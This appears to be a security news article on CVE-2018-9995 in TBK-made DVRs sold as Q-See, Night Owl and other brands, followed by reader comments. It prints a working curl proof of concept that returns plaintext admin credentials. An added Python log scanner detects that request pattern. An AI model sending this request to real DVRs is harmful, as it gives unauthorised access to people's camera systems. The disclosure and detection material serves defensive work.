Exploit Provides Plain Text Credentials For TBK, Q-See, Night Owl, And Other DVRs
A vulnerability which provides plain text credentials for affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. This vulnerability is outlined in CVE-2018-9995.
The DVRs affected are manufactured by TBK as well as OEM'd by:
- DVR Login
- HVR Login
- MDVR Login
- Night OWL
- XVR 5 in 1
The exploit, tested by IPVM, is a simple CURL command:
curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).
The plain text credentials returned from this command granted admin access to the device.
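A defender-side check for this request pattern, as an added example that is not from the IPVM article or the researcher's PoC: it scans constructed reverse-proxy style log lines (a hypothetical log format that records the request line and the Cookie header) and flags requests matching the CVE-2018-9995 credential-list request, i.e. /device.rsp with opt=user&cmd=list and a Cookie header carrying uid=admin.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in a hypothetical gateway log format
# (timestamp, source IP, method, URI, quoted Cookie header).
SAMPLE_LOG = """\
2018-04-10T12:00:01Z 203.0.113.5 GET /device.rsp?opt=user&cmd=list cookie="uid=admin"
2018-04-10T12:00:02Z 198.51.100.7 GET /index.html cookie="-"
2018-04-10T12:00:03Z 203.0.113.5 GET /device.rsp?opt=user&cmd=list cookie="-"
2018-04-10T12:00:04Z 192.0.2.9 POST /login.rsp cookie="-"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<uri>\S+) cookie="(?P<cookie>[^"]*)"$'
)

def is_cve_2018_9995_request(uri, cookie):
    """True if the request matches the credential-list pattern from CVE-2018-9995:
    path /device.rsp with opt=user&cmd=list and a Cookie header carrying uid=admin."""
    parts = urlsplit(uri)
    if parts.path != "/device.rsp":
        return False
    qs = parse_qs(parts.query)
    if qs.get("opt") != ["user"] or qs.get("cmd") != ["list"]:
        return False
    # The Cookie header may hold several name=value pairs; look for uid=admin among them.
    pairs = dict(p.strip().split("=", 1) for p in cookie.split(";") if "=" in p)
    return pairs.get("uid") == "admin"

def find_hits(log_text):
    """Return (timestamp, source_ip) for each log line matching the exploit pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected format
        if is_cve_2018_9995_request(m["uri"], m["cookie"]):
            hits.append((m["ts"], m["src"]))
    return hits

if __name__ == "__main__":
    for ts, src in find_hits(SAMPLE_LOG):
        print(f"{ts} possible CVE-2018-9995 credential request from {src}")
```

Only the first sample line matches: the third line hits the same endpoint but lacks the uid=admin cookie, so a stricter rule leaves it alone while a broader alert on any unauthenticated /device.rsp access would still be reasonable.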
Obviously they really tried hard to hide this backdoor ;)
Do they have a businesses presence in the US?
TBK is a Spanish company; however, OEMs like Q-See and Night Owl can be found at big box retailers in the US like Best Buy, Home Depot, Walmart, Costco, and more.
Has anyone created a map for vulnerable devices, similar to the Hikvision one (IIRC)? You could knock on some doors of people who have these kits and say, would you mind if I show you how insecure your camera system is? If they say yes, show them the vuln and offer to correct the issues. Someone could make a business out of doing just that for all of the vulnerabilities we see here.
Does anyone have the MAC prefix for their devices?
Manufactured by TBK, a Spanish company? Are they really manufactured in a Spanish country?
Those DVRs were designed and manufactured by Streamax, China.